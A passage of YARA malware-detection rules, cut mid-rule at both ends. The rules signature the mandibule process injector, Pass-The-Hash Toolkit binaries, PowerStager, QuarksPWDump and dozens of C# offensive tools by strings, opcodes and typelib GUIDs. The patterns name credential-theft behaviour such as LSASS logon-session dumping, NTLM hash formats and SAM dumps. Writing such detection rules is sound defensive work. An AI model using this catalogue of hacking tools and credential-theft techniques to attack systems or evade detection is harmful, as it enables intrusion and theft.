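      $hex05 = { E8 09 07 00 00 81 C1 FC 1F 00 00 8D 81 26 E1 FF FF } // st
      $hex06 = { 56 53 83 EC 24 E8 E1 05 00 00 81 C3 D0 1E 00 00 8B 44 24 30 } // mn
      $hex07 = { 81 C3 E8 29 00 00 C7 44 24 0C } // pt
      $hex08 = { E8 C6 D5 FF FF 83 C4 0C 68 00 01 00 00 } // ld
   condition:
      3 of them
}

rule TOOLKIT_Mandibule {
   meta:
      description = "Generic detection for ELF Linux process injector mandibule generic"
      reference = "https://imgur.com/a/MuHSZtC"
      author = "unixfreaxjp"
      org = "MalwareMustDie"
      date = "2018-06-01"
   condition:
      /* Any one of the three private sub-rules, gated by the ELF magic (is__elf,
         defined at the top of this file) and the 30KB size cap. The gate is
         parenthesised around the whole disjunction on purpose: in YARA `and`
         binds tighter than `or`, so an unparenthesised `A or B and gate` would
         let the A branch fire on non-ELF input of any size. */
      ( is__str_mandibule_gen1 or is__hex_mid_mandibule32 or is__hex_top_mandibule64 )
      and is__elf and filesize < 30KB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.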
*/
/*
   Pass-The-Hash Toolkit components (Core Security / Hernan Ochoa).
   Auto-generated rules keyed on each tool's own banner, usage and error text;
   every rule below also requires the MZ signature at offset 0 and a size cap.
*/

/* whosthere-alt.exe: banner, usage and error text; any two of eight strings. */
rule whosthere_alt : Toolkit {
   meta:
      description = "Auto-generated rule - file whosthere-alt.exe"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
   strings:
      $s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
      $s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
      $s2 = "dump output to a file, -o filename" fullword ascii
      $s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
      $s4 = "Error: pth.dll is not in the current directory!." fullword ascii
      $s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
      $s6 = ".\\pth.dll" fullword ascii
      $s7 = "Cannot get LSASS.EXE PID!" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 280KB and 2 of them
}

/* iam-alt.exe: banner, usage and error text; any two of eight strings. */
rule iam_alt_iam_alt : Toolkit {
   meta:
      description = "Auto-generated rule - file iam-alt.exe"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
   strings:
      $s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
      $s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
      $s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
      $s3 = "username:domainname:lmhash:nthash" fullword ascii
      $s4 = "Error in cmdline!. Bye!." fullword ascii
      $s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
      $s6 = "nthash is too long!." fullword ascii
      $s7 = "LSASS HANDLE: %x" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
}

/* genhash.exe: usage text plus a 16-byte hex format string; any two of five.
   Identifiers $s1, $s3..$s6 are kept as generated ($s2 was never present). */
rule genhash_genhash : Toolkit {
   meta:
      description = "Auto-generated rule - file genhash.exe"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
   strings:
      $s1 = "genhash.exe <password>" fullword ascii
      $s3 = "Password: %s" fullword ascii
      $s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
      $s5 = "This tool generates LM and NT hashes." fullword ascii
      $s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}

/* iamdll.dll: module name, dependency name and export name; all three required. */
rule iam_iamdll : Toolkit {
   meta:
      description = "Auto-generated rule - file iamdll.dll"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
   strings:
      $s0 = "LSASRV.DLL" fullword ascii
      $s1 = "iamdll.dll" fullword ascii
      $s2 = "ChangeCreds" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 115KB and all of them
}

/* iam.exe: usage and error text; all seven strings required (stricter than the
   sibling rules above). $s2 is deliberately not `fullword`. */
rule iam_iam : Toolkit {
   meta:
      description = "Auto-generated rule - file iam.exe"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
   strings:
      $s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
      $s2 = "iam.exe -h administrator:mydomain:" ascii
      $s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
      $s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
      $s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
      $s6 = "Error in cmdline!. Bye!." fullword ascii
      $s7 = "Checking LSASRV.DLL...." fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

/* pth.dll: debug-log path, module name and search diagnostics; four of five required. */
rule whosthere_alt_pth : Toolkit {
   meta:
      description = "Auto-generated rule - file pth.dll"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
   strings:
      $s0 = "c:\\debug.txt" fullword ascii
      $s1 = "pth.dll" fullword ascii
      $s2 = "\"Primary\" string found at %.8Xh" fullword ascii
      $s3 = "\"Primary\" string not found!" fullword ascii
      $s4 = "segment 1 found at %.8Xh" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 240KB and 4 of them
}

/* whosthere.exe: banner, usage and error text; any two of six.
   $s3 is a truncated usage line and is therefore not `fullword`. */
rule whosthere : Toolkit {
   meta:
      description = "Auto-generated rule - file whosthere.exe"
      author = "Florian Roth"
      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
      date = "2015-07-10"
      score = 80
      hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
   strings:
      $s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
      $s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
      $s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
      $s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
      $s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
      $s6 = "Cannot get LSASS.EXE PID!" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 320KB and 2 of them
}

/* PowerStager executables (x86 and x64). Requires the MZ signature, all seven
   C-runtime/Win32 import names, the drop-path format string, "TEMP", the
   placeholder file description, and both hex patterns of either the x86 or the
   x64 decoder set. */
rule Powerstager {
   meta:
      description = "Detects PowerStager Windows executable, both x86 and x64"
      author = "Jeff White - jwhite@paloaltonetworks.com @noottrak"
      date = "02JAN2018"
      reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/"
      reference2 = "https://github.com/z0noxz/powerstager"
      hash1 = "758097319d61e2744fb6b297f0bff957c6aab299278c1f56a90fba197795a0fa" // x86
      hash2 = "83e714e72d9f3c500cad610c4772eae6152a232965191f0125c1c6f97004b7b5" // x64
   strings:
      // "%s\<12 alphanumerics>": format string for the dropped file path
      $filename = /%s\\[a-zA-Z0-9]{12}/
      $pathname = "TEMP" wide ascii
      // kept from the original for reference; not part of the condition
      // $errormsg = "The version of this file is not compatible with the version of Windows you're running." wide ascii
      $filedesc = "Lorem ipsum dolor sit amet, consecteteur adipiscing elit" wide ascii

      $apicall_01 = "memset"
      $apicall_02 = "getenv"
      $apicall_03 = "fopen"
      $apicall_04 = "memcpy"
      $apicall_05 = "fwrite"
      $apicall_06 = "fclose"
      $apicall_07 = "CreateProcessA"

      // author-labelled decoder-loop opcode sequences, per architecture
      $decoder_x86_01 = { 8D 95 [4] 8B 45 ?? 01 D0 0F B6 18 8B 4D ?? }
      $decoder_x86_02 = { 89 C8 0F B6 84 05 [4] 31 C3 89 D9 8D 95 [4] 8B 45 ?? 01 D0 88 08 83 45 [2] 8B 45 ?? 3D }
      $decoder_x64_01 = { 8B 85 [4] 48 98 44 0F [7] 8B 85 [4] 48 63 C8 48 }
      $decoder_x64_02 = { 48 89 ?? 0F B6 [3-6] 44 89 C2 31 C2 8B 85 [4] 48 98 }
   condition:
      // uint16be(0) == 0x4D5A is the big-endian read of the "MZ" bytes
      // (same check as uint16(0) == 0x5a4d elsewhere in this set)
      uint16be(0) == 0x4D5A
      and all of ($apicall_*)
      and $filename and $pathname and $filedesc
      and ( 2 of ($decoder_x86*) or 2 of ($decoder_x64*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
/* QuarksPWDump, all known versions. Keys on two Win32 API error messages, the
   progress message and the SAM dump file-name pattern; all four strings are
   required. There is intentionally no MZ or filesize gate in this rule. */
rule QuarksPwDump_Gen : Toolkit {
   meta:
      description = "Detects all QuarksPWDump versions"
      author = "Florian Roth"
      date = "2015-09-29"
      score = 80
      hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
      hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
      hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
      hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
      hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
      hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
      hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
   strings:
      $s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
      $s2 = "%d dumped" fullword ascii
      $s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
      $s4 = "\\SAM-%u.dmp" fullword ascii
   condition:
      all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// These rules have room for false positives if e.g. a dual use tool is contained within a hack tool repo.
// Could also be done with https://yara.readthedocs.io/en/stable/modules/dotnet.html#c.typelib but that needs an extra module.
rule HKTL_NET_GUID_CSharpSetThreadContext { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/CSharpSetThreadContext" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii nocase wide $typelibguid1 = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DLL_Injection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ihack4falafel/DLL-Injection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LimeUSB_Csharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Ladon { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/k8gege/Ladon" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WhiteListEvasion { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/khr0x40sh/WhiteListEvasion" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "858386df-4656-4a1e-94b7-47f6aa555658" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule 
HKTL_NET_GUID_Lime_Downloader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Downloader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DarkEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/K1ngSoul/DarkEye" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpKatz { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpKatz" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ExternalC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ryhanson/ExternalC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide $typelibguid1 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Povlsomware { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/povlteksttv/Povlsomware" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RunShellcode { meta: description = "Detects c# 
red/black-team tools via typelibguid" reference = "https://github.com/zerosum0x0/RunShellcode" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLoginPrompt { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/shantanu561993/SharpLoginPrompt" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Adamantium_Thief { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/Adamantium-Thief" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PSByPassCLM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/PSByPassCLM" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "46034038-0113-4d75-81fd-eb3b483f2662" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_physmem2profit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/physmem2profit" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "814708c9-2320-42d2-a45f-31e42da06a94" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NoAmci { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/med0x2e/NoAmci" author = "Arnim Rupp" 
date = "2020-12-13" strings: $typelibguid0 = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBlock { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/CCob/SharpBlock" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_nopowershell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/bitsadmin/nopowershell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LimeLogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/LimeLogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AggressorScripts { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/harleyQu1nn/AggressorScripts" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Gopher { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/EncodeGroup/Gopher" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii nocase wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AVIator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Ch0pin/AVIator" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_njCrypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xPh0enix/njCrypter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii nocase wide $typelibguid1 = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMiniDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpMiniDump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CinaRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/wearelegal/CinaRAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii nocase wide $typelibguid1 = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ToxicEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/ToxicEye" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) 
== 0x00004550) and any of them } rule HKTL_NET_GUID_Disable_Windows_Defender { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvoke_PoC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/dtrizna/DInvoke_PoC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ReverseShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/chango77747/ReverseShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii nocase wide $typelibguid1 = "8abe8da1-457e-4933-a40d-0958c8925985" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SharpC2/SharpC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii nocase wide $typelibguid1 = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii nocase wide $typelibguid2 = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii nocase wide $typelibguid3 = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii nocase wide $typelibguid4 = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii nocase wide $typelibguid5 = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule 
HKTL_NET_GUID_SneakyExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HackingThings/SneakyExec" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UrbanBishopLocal { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/UrbanBishopLocal" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cobbr/SharpShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "bdba47c5-e823-4404-91d0-7f6561279525" ascii nocase wide $typelibguid1 = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EvilWMIProvider { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/sunnyc7/EvilWMIProvider" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_GadgetToJScript { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/med0x2e/GadgetToJScript" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii nocase wide $typelibguid1 = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) 
and any of them } rule HKTL_NET_GUID_AzureCLI_Extractor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0x09AL/AzureCLI-Extractor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UAC_Escaper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/UAC-Escaper" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "95359279-5cfa-46f6-b400-e80542a7336a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HTTPSBeaconShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/limbenjamin/HTTPSBeaconShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AmsiScanBufferBypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellcodeLoader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Hzllaga/ShellcodeLoader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_KeystrokeAPI { meta: description = "Detects c# 
red/black-team tools via typelibguid" reference = "https://github.com/fabriciorissetto/KeystrokeAPI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii nocase wide $typelibguid1 = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellCodeRunner { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/antman1p/ShellCodeRunner" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii nocase wide $typelibguid1 = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OffensiveCSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/diljith369/OffensiveCSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii nocase wide $typelibguid1 = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii nocase wide $typelibguid2 = "512015de-a70f-4887-8eae-e500fd2898ab" ascii nocase wide $typelibguid3 = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii nocase wide $typelibguid4 = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii nocase wide $typelibguid5 = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii nocase wide $typelibguid6 = 